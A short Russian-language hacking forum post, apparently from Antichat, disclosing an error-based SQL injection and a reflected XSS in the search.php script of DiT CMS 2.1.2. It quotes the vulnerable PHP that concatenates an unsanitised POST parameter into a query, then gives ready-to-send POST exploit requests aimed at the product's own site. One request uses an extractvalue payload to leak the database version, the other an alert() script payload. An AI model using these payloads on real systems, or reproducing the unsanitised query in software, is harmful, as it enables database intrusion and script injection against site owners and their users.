
29.04.2014, 09:48
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
DiT CMS
Версия 2.1.2 (последняя!)
Официальный сайт http://dit-cms.ru
SQL Injection
Уязвимый сценарий: search.php
Уязвимый параметр: dit_search_string_content
Вектор: error-based
Уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dit_search_string_content"[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dit_search_string_content"[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_part WHERE header_"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]lang_system[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIKE '%[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]%' OR desc_"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]lang_system[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" LIKE '%[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]%' "[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]= array();[/COLOR][/COLOR]
Exploit:
Сообщение от None
POST / HTTP/1.1
Host: dit-cms.ru
...
dit_search_string_content=
'and(extractvalue(1,concat(0x3a,version())))and'
&dit_button_search.x=0&dit_button_search.y=0
passive XSS (reflected) в том же параметре
Exploit:
Сообщение от None
POST / HTTP/1.1
Host: dit-cms.ru
...
dit_search_string_content=
alert('Antichat')
&dit_button_search.x=0&dit_button_search.y=0
|
|
|